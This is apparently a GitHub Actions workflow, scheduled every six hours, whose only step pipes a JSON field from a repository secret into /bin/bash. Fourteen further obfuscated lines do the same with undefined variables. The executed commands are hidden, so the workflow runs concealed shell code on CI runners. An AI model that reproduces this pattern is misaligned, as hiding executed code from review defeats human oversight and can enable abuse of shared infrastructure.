name: zhoudapeng9813

on:
  workflow_dispatch:
  schedule:
    - cron: '46 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhoudapeng9813
        env:
          pw28: ${{ secrets.pw28 }}
        run: |
          echo $pw28 | jq -r .sh795 | /bin/bash
          echo $cxzr46255 | jq -r .rwfnc557 | /bin/bash
          echo $eemi318 | jq -r .r2915 | /bin/bash
          echo $mqfu61 | jq -r .zwil70017 | /bin/bash
          echo $wbl3586 | jq -r .zcuxi62 | /bin/bash
          echo $ewd77 | jq -r .tc02423 | /bin/bash
          echo $pdqdw715 | jq -r .m44851 | /bin/bash
          echo $st8 | jq -r .bswj40080 | /bin/bash
          echo $ihldi16 | jq -r .bwe1 | /bin/bash
          echo $h6 | jq -r .jblvn99 | /bin/bash
          echo $s67 | jq -r .s4099 | /bin/bash
          echo $qqh7132 | jq -r .fwsy216 | /bin/bash
          echo $ynpzg036 | jq -r .gifud0 | /bin/bash
          echo $ba083 | jq -r .irzn1 | /bin/bash
          echo $gsiin016 | jq -r .litkg060 | /bin/bash

